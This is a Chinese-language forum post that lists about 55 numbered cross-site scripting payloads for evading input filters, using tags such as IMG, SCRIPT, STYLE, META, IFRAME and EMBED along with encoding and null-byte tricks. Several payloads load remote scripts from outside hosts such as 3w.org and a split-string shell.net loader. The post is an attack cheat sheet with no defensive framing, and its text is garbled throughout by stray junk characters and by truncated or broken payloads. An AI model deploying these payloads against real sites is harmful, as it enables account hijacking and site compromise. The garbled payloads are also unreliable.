(1)普通的XSS JavaScript注入
; |+ V; q( C9 h<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. w* |5 j3 _, l$ e5 p(99)另类弹框
' b; [* N8 r3 P5 @& ?<q/oncut=alert()>1- p( b9 L" L& `! b
<s/onclick=alert()>b* W' F7 o) B; _% r6 ?7 @/ k3 `& P
<XSS=" onclick="alert(1)//">clickme</SSX=">% v, k, R1 V! H) X8 T& z2 C
<zzz onclick=alert`1`>clickme</zzz>
- }, U0 ^" m- `7 a! l+ T- | <a onclick=alert`1`>clickme</a>
$ E, q# m# A9 E<a=">clickme</a=">
$ {+ {/ _, ], b4 @7 t: _<a=">clickme</a>
. }; r' ?' y7 I, N<z=">clickme</z=">
5 i( x" g( o" r; s; M1 c<z onclick=alert`1`>clickme</z>. C% d1 \1 q: L1 n0 C" ?+ `
2 h- D$ S2 j6 F(2)IMG标签XSS使用JavaScript命令
% H b: t: I0 C9 F) U! z# Z3 i<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 w) j" w- c0 d0 h5 P B2 ?4 T
5 w* L7 _1 H& e( N3 t5 D) v(3)IMG标签无分号无引号
: l0 k% c: @8 |2 E<IMG SRC=javascript:alert(‘XSS’)>( |2 T3 Q6 N/ i. p
9 i: [' e# X: F$ F; n* R(4)IMG标签大小写不敏感5 J, Z" P, j& J5 A3 x
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>7 j4 j& O# ~. w A0 }1 ]
5 ]% Q. S1 A$ {9 U, z. }+ O(5)HTML编码(必须有分号)
1 s* g- `4 [, y<IMG SRC=javascript:alert(“XSS”)>1 C2 m& F4 m" u8 O+ v
* g# o! T# Y; b& C7 C, [
(6)修正缺陷IMG标签/ `" M9 e6 t. u* U) `
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>6 O2 H2 V# i; d$ e! C; ^7 m
- G" w& x9 S; o4 }! `. q(7)formCharCode标签(计算器)
# q8 }/ w8 }2 a7 j% J2 x t3 n1 a$ |<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; }) a K, E2 x* V
' M2 s# L1 ?' v; f6 f(8)UTF-8的Unicode编码(计算器)
) y$ W7 V Y$ s, Q5 V<IMG SRC=jav..省略..S')>0 v: F: I+ G/ p% w8 z7 R/ }
4 [, _7 I2 w# M3 A! X( U(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
, [( H0 H( z, @8 R$ S" D0 y l# ?<IMG SRC=jav..省略..S')>
9 w+ L) P) @; j- i: D
5 N( H @8 \8 X# o; V% n5 n6 q(10)十六进制编码也是没有分号(计算器)7 C' D# v& e9 u
<IMG SRC=\'#\'" /span>
4 ~, S' X; K/ X7 T! U) b
7 _9 U0 L! X3 f; G }1 d(11)嵌入式标签,将Javascript分开; l4 E; M2 f' {$ l! E# |; U
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>/ |8 r3 ^7 z1 K" G% v* s
" l% U; P& r/ z7 z3 B$ y8 N2 x
(12)嵌入式编码标签,将Javascript分开' }' A2 l7 J2 X: v- y7 I- W7 Y5 B/ p
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 p; P7 @2 g2 L3 v% O% P8 X; K2 Z! X
(13)嵌入式换行符
% f4 j, F6 ?4 \3 m<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
$ q; k+ L- l3 l) z1 {2 A3 K; k8 c! R3 f( r! O2 h
(14)嵌入式回车
# L' ]8 J; B6 y* Y4 w/ ?& h; R" F<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
+ I1 d" m% A# Z o' J; r4 u9 C& J: z# Z$ V8 [' Q$ x+ G
(15)嵌入式多行注入JavaScript,这是XSS极端的例子: o+ t% W5 @1 p h
<IMG SRC=\'#\'" /span>2 k9 f9 C7 x7 C7 ~% k4 R; A' R
, w) E/ F8 a, l5 b! l(16)解决限制字符(要求同页面)
( `5 A4 {5 j4 F6 Y/ {9 v3 J<script>z=’document.’</script>
0 Q5 z. G2 t( o' X! ?<script>z=z+’write(“‘</script>
5 S, x2 h5 O& n5 n) D<script>z=z+’<script’</script>- o1 l: u% v+ `: R# G! Y9 y8 Q4 {& i
<script>z=z+’ src=ht’</script>
8 K9 M3 r) k5 V* _9 m9 c; Y. K Z<script>z=z+’tp://ww’</script>2 ]! L0 ]4 H0 W5 v* x- {: i
<script>z=z+’w.shell’</script>
$ f- p3 g: }7 p1 s. l/ Y! A/ C<script>z=z+’.net/1.’</script>! l: ~4 N' H/ ^4 d9 q# Y
<script>z=z+’js></sc’</script>
6 N" X8 _1 W3 U* w<script>z=z+’ript>”)’</script>, z' O" ^/ m+ }8 M
<script>eval_r(z)</script>
8 U( W- c/ d% V/ {. E$ ^7 M, Z
0 ]" |! C+ c$ h(17)空字符- U3 _- x% x, e7 F
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
4 \5 g/ ?- W1 W3 z; j
/ I+ T+ ^& U% W. f* @4 \, k(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用, r, C# Q1 f I! `4 W: O' I+ [
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out% x- n7 \6 C0 o, q
6 a: @! j( t) w/ b
(19)Spaces和meta前的IMG标签% Y1 M( C }+ _) I
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>; _4 g+ u/ X7 g0 [8 M, o8 R
7 x& i7 w& m7 }
(20)Non-alpha-non-digit XSS
5 ]' j! S) z# \0 Q5 }; b7 I" }<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
; |, Q" G/ @4 ^7 n
( F' u9 G ~3 w) S/ ?) }(21)Non-alpha-non-digit XSS to 2 ]) d! l1 |( v2 c1 m' |+ u
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
4 P' u; A- O$ f# C
) g* m6 @. U4 X" |(22)Non-alpha-non-digit XSS to 3) s( L4 h$ }4 N9 s8 W2 b( a5 {
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>! O/ J, A4 L- C* r
) U: M% ?+ n: I% L; H
(23)双开括号
; L. P9 B) B* o1 X- ^+ d<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! E$ N* V$ u4 r$ p8 I0 i5 W2 {: H- K+ g
(24)无结束脚本标记(仅火狐等浏览器)5 O; M. Z' j, C- p
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
( s8 y2 c- g5 S2 R
0 h- K+ w: E& f( g8 n" Y(25)无结束脚本标记20 t. i+ r" R5 s( c9 M
<SCRIPT SRC=//3w.org/XSS/xss.js>
+ O0 ]; ?2 }' r9 g* N' V. g" K8 b' i% C
(26)半开的HTML/JavaScript XSS! _5 l$ w+ v5 l" q
<IMG SRC=\'#\'" /span>3 T+ x! @& m/ a5 X% d
& s0 g& b5 L1 q( y" `; T) m
(27)双开角括号
+ V) J3 A/ u6 a) [( [: P; t; o<iframe src=http://3w.org/XSS.html <
; E# H# W/ L8 y- B6 k2 R9 w& R
% M2 [* U0 _4 ~1 R/ a(28)无单引号 双引号 分号
. g1 {' g- ` @" X1 H<SCRIPT>a=/XSS/' d) S0 b' p, j" S
alert(a.source)</SCRIPT>
) o( Z8 {" K+ I7 r% G. N8 j% s4 s
" w) b, X1 S8 V K(29)换码过滤的JavaScript
/ f: _+ q) q% x) h; H+ ^\”;alert(‘XSS’);//
9 h! W7 R9 ?! l' n3 S U0 c4 t# x6 I2 g
(30)结束Title标签' x7 V7 G/ C/ a2 M1 R
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>; v& o4 _/ x: o* c% i! `
# z0 h! r: c% l; |
(31)Input Image4 b5 ?- ?0 N4 P7 I$ T
<INPUT SRC=\'#\'" /span>
% R. I" e3 a' w; }9 Y# e& d* t* {9 q! Z/ _7 g! Y% k
(32)BODY Image
6 K1 ?5 c6 F% _ `" K1 E<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
* C0 Q9 ~3 c l V. j9 [# T: r u1 ~% h$ k
(33)BODY标签
: ^7 S7 m6 u& M" B, o6 S<BODY(‘XSS’)>6 J% b0 n, [6 Y4 @9 b7 a
6 R/ P2 |, a% T& T* P- ](34)IMG Dynsrc3 z q) F' F+ |4 F+ }" o! g; m4 E# \
<IMG DYNSRC=\'#\'" /span>, v. U0 x$ M- n& [5 p# j
0 A: \- o& ]) |4 }. J) F
(35)IMG Lowsrc# h; ?9 t8 b( D$ I# p
<IMG LOWSRC=\'#\'" /span>
* e1 `+ H/ F, e( G: R: ]8 _" G) I6 N# i
(36)BGSOUND7 d' K. y* P J2 W d
<BGSOUND SRC=\'#\'" /span>
b# I$ c- n# b# W( s3 m: y% S. P( P5 c6 G$ P$ ^
(37)STYLE sheet! [7 r" N0 b) q8 F! P
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
2 K% M+ |5 \ a5 O9 }
/ |$ ]: K. l g W2 J, ^(38)远程样式表7 \) G/ g4 k' C v7 `
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>0 }4 B1 K" l$ x/ D5 P7 {
* u' Z0 e- I4 L1 `& U
(39)List-style-image(列表式). N% ? I, S. m& X1 \0 F4 \4 Y
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS' y% [( o% O: |; h5 ]
: ]' h, M2 I( ~6 t
(40)IMG VBscript
1 j; @0 v4 q7 R3 r3 u1 _<IMG SRC=\'#\'" /STYLE><UL><LI>XSS. @6 A! r+ ~5 s7 n3 y1 t
" }6 z# t! @! A M0 Z }
(41)META链接url# R$ I& M+ H& r: V+ r$ }% H1 y. F$ B1 g
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
, Z3 F1 W' y5 Z8 ^) ?9 ^
' e& X6 m# r3 ?3 {# S* l8 m; H(42)Iframe8 f. f' R0 t, i' g8 ]4 O: Y
<IFRAME SRC=\'#\'" /IFRAME>9 e% n4 c6 z7 H) _3 S( o
: Y" O! F* U4 ~. C
(43)Frame
: p0 {$ s+ V& G% ?$ ]- f9 Y) ]3 j& i<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
% E! q- @1 A2 m) `. |
4 M$ A! k6 b) h& u9 i; e0 ](44)Table
9 ` J! z2 w: i<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
# T5 @ P; `& ~2 C8 l- m/ w5 u3 f3 b' o; `- A; F
(45)TD2 f: i( w' ^- N8 K$ ?
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
2 N0 G/ i. C( G. t, i7 N
; y! x, v4 j# }, k3 G# z(46)DIV background-image
; \4 b6 C6 M0 @8 e. V0 I<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ \0 t( ?6 p7 X6 E8 P
; x' L# v; T0 `. W( v
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279) o5 W0 s$ B! O! h2 v
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>7 P/ ~% K2 r: \2 y6 a: S! a) e
9 ]& E8 M7 g6 X" U
(48)DIV expression
4 Q8 Y" J0 H' j1 w/ _; I<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
4 \. L8 x0 y; a) J z& a
+ H, k% T7 Z' _/ t(49)STYLE属性分拆表达
: O4 ]4 {9 m8 B' T _+ d<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>+ w' m5 H( g, g/ C1 \
% K! c+ v6 N9 k# p
(50)匿名STYLE(组成:开角号和一个字母开头)5 W, n: O8 K5 n! b" i4 c
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
7 N/ U' @. c) \/ A6 x/ W3 c0 G+ c0 w% ^# f6 R- P
(51)STYLE background-image: w4 \4 a/ c* T. v
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
/ O5 X7 h; a% c# p6 E/ E" z4 S) p/ B, g1 A% I
(52)IMG STYLE方式
- N# X/ a, L4 S3 A8 nexppression(alert(“XSS”))’>' A% G) R5 `7 Y
( o; r8 k7 Q2 f2 }4 y
(53)STYLE background4 L( L( G/ ?9 l
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
, s7 t4 t% w9 ~: G5 c* `( t$ g
7 e3 ^$ g5 h5 G; @( _* v(54)BASE5 {1 w; t+ o& ?7 R0 E
<BASE HREF=”javascript:alert(‘XSS’);//”>
7 X0 Z5 N8 U! |! }9 t& i- Y; e
y5 h6 N8 t! \, r h. F( z(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
7 b: G( o! U& ]9 h4 \) I5 |: [1 \<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>. K1 y3 n# L( w
|
发表于 2016-4-28 10:06:15
收藏
支持
反对